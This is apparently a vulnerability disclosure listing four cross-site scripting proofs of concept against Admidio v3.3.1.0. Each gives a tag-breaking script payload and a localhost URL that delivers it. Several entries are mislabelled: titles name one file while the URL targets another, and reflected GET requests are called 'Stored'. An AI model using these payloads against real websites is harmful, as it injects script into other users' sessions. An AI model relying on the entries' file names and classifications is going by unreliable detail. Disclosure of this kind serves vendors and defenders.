===========================================================================================
# Exploit Title: Admidio ADM - ’lists_show.php’ XSS Inj.
# Dork: N/A
# Date: 06-04-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://sourceforge.net/projects/admidio/
# Version: v3.3.1.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Admidio is a free open source user management system for websites of
organizations and groups. The system has a flexible role model so that it’s possible to
reflect the structure and permissions of your organization.
===========================================================================================
# POC - XSS (Stored)
# Parameters : lists_show.php
# Attack Pattern : ’"@--></style></scRipt><scRipt>alert(0x001ECD)</scRipt>
# GET Method : http://localhost/admidio3310/admidio/adm_program/modules/messages/messages_write.php?’%22@--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x001ECD)%3C/scRipt%3E
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Admidio ADM - ’message_write.php’ XSS Inj.
# Dork: N/A
# Date: 06-04-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://sourceforge.net/projects/admidio/
# Version: v3.3.1.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Admidio is a free open source user management system for websites of
organizations and groups. The system has a flexible role model so that it’s possible to
reflect the structure and permissions of your organization.
===========================================================================================
# POC - XSS (Stored)
# Parameters : message_write.php
# Attack Pattern : ’"--></style></scRipt><scRipt>alert(0x001EB1)</scRipt>
# GET Method : http://localhost/admidio3310/admidio/adm_program/modules/messages/messages_write.php?’%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x001EB1)%3C/scRipt%3E
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Admidio ADM - ’login.php’ XSS Inj.
# Dork: N/A
# Date: 06-04-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://sourceforge.net/projects/admidio/
# Version: v3.3.1.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Admidio is a free open source user management system for websites of
organizations and groups. The system has a flexible role model so that it’s possible to
reflect the structure and permissions of your organization.
===========================================================================================
# POC - XSS (Stored)
# Parameters : login.php
# Attack Pattern : ’"--></style></scRipt><scRipt>alert(0x001D42)</scRipt>
# GET Method : http://localhost/admidio3310/admidio/adm_program/system/login.php?’%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x001D42)%3C/scRipt%3E
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Admidio ADM - ’login.php’ XSS Inj.
# Dork: N/A
# Date: 06-04-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://sourceforge.net/projects/admidio/
# Version: v3.3.1.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Admidio is a free open source user management system for websites of
organizations and groups. The system has a flexible role model so that it’s possible to
reflect the structure and permissions of your organization.
===========================================================================================
# POC - XSS (Stored)
# Parameters : login.php
# Attack Pattern : ’"--></style></scRipt><scRipt>alert(0x007612)</scRipt>
# GET Method : http://localhost/admidio3310/admidio/adm_program/modules/guestbook/guestbook_new.php?’%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x007612)%3C/scRipt%3E
===========================================================================================